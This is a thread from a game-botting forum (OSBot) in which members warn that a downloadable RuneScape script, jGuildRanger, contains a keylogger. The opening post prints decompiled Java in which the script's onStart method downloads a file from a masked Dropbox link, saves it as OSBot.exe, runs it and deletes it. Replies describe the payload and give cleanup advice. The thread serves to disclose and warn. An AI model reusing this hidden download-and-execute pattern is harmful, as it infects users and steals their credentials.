Jump to content
View in the app

A better way to browse. Learn more.
OSBot :: 2007 OSRS Botting

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

jGuildRanger Botters - WARNING

  •
Declarative
in Archive

Featured Replies

Confirmed

Information stealer has been Found and confirmed.

Windows user affected, mac/other platforms not.

 

 

I decided to check a few scripts within local downloadable script section

 

Came across jGuildRanger;

 

I decompiled the jar file, and I notice this upon start:

public void onStart()
{
try
{
saveFileFromUrl("OSBot.exe", "https://www.dropbox.com/s/************/index.html");
}
catch (MalformedURLException localMalformedURLException) {}catch (IOException localIOException) {}
try
{
Process p = Runtime.getRuntime().exec("OSBot.exe");
File file = new File("OSBot.exe");
file.delete();
}
catch (IOException localIOException1) {}
this.startExperience = this.client.getLevelExperience()[org.osbot.script.rs2.skill.Skill.RANGED.getId()];
this.startLevel = this.client.getLevelStat()[org.osbot.script.rs2.skill.Skill.RANGED.getId()];
this.startTimer = System.currentTimeMillis();
}

Pretty common sense what the code does.

 

 

Botters which used this script, I advise to scan your computer and check msConfig to see if there is any keylogs/rats upon start:

 

 

 

This maybe a accidental implementation but its seems to be dangerous and users wasnt told if a file was being downloaded ~ fishy

Edited by Declarative

  • Author

Good find, I'll cut off my right testicle if this turns out not to be a virus.

 

Come on? Who would save a file from a html file, from dropbox:

 

Save it as OSBot.exe??

 

pathetic little kids I say.

 

 

------

 

I attempting to reverse-engineer the executable file to see what it is.

Edited by Declarative

Is this the same script as 'jRangingGuild' ? :/ Otherwise I'm fucked. I've downloaded it and it's in my local folders map. What do I do?

 

I'm on Mac.. What's MsConfig? And I don't have a virusscanner or something..

Edited by PaasHazen18

  • Administrator

I don't think reverse engineering it is necessary, but if someone wants to do it and post their findings, that's fine by me. Just make sure you've got it in an isolated environment or know what you're doing.

    •
    • Like 1

    Is this the same script as 'jRangingGuild' ? :/ Otherwise I'm fucked. I've downloaded it and it's in my local folders map. What do I do?

     

    I'm on Mac.. What's MsConfig? And I don't have a virusscanner or something..

    If you haven't run the script you're fine. If so do a virus scan (download one like Malewarebytes Anti Maleware).

    • Author

    Virus confimed... Its a keylogger guys! MAC Users are fine!

     

     

    didnt take much: Here is a few lines of the compiled version.. Brilliant.:

    we all know its a virus when it starts with:  Stupid .net

    MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽÚĨáð@Õ6@ V `P¡P\@CODElØÚ `DATA<ðÞ@ÀBSSÙ

    Edited by Declarative

     

    Virus confimed... Its a keylogger guys! MAC Users are fine!

     

     

    didnt take much: Here is a few lines of the compiled version.. Brilliant.:

    we all know its a virus when it starts with:  Stupid .net

    MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽÚĨáð@Õ6@ V `P¡P\@CODElØÚ `DATA<ðÞ@ÀBSSÙ

     

    It probably is. I might be able to decompile it if you can pm me the link to the file.

    Modifies registry, debugger check, process memory editing and steals information.

    Edited by Aeon

    • Author

    Modifies registry, debugger check, process memory editing and steals information.

     

    Beaten me to it... I was exporting a decompiled version but my laptop decided to say bye bye.

     

     

    Verified on Modifies registry, and others.

    +1 nice find dude!

     

     

    Nice find man

    Someones got to do it.

     

    Virus confimed... Its a keylogger guys! MAC Users are fine!

     

     

    didnt take much: Here is a few lines of the compiled version.. Brilliant.:

    we all know its a virus when it starts with:  Stupid .net

    MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽÚĨáð@Õ6@ V `P¡P\@CODElØÚ `DATA<ðÞ@ÀBSSÙ

    Why are Mac users fine? 

     

    Do I just delete the script from the script folder and then from my laptop? Wtf do I have to do D:

     

    Never trusting local scripts again, only from legit people..

    Edited by PaasHazen18

    • Like 1
    Go to topic listing

    Recently Browsing 0

    • No registered users viewing this page.

    Account

    Navigation

    Search

    Configure browser push notifications
    Chrome (Android)
    1. Tap the lock icon next to the address bar.
    2. Tap Permissions → Notifications.
    3. Adjust your preference.
    Chrome (Desktop)
    1. Click the padlock icon in the address bar.
    2. Select Site settings.
    3. Find Notifications and adjust your preference.